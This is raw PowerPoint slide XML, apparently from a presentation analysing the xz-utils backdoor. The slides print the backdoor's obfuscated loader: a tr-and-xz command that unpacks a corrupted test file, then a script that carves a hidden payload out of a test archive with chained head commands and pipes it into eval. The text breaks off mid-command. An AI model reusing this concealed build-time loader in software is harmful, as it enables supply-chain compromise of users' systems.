          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150839" y="1791222"/>
            <a:ext cx="13573848" cy="55707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100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/bad-3-corrupt_lzma2.xz | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\t \-_" " \t_\-" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -d
####Hello####
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x86 0xF9 0x5A 0xF7 0x2E 0x68 0x6A 0xBC</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> test -f ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status;then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>="../../$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
fi
export i="((head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+724</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";
(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
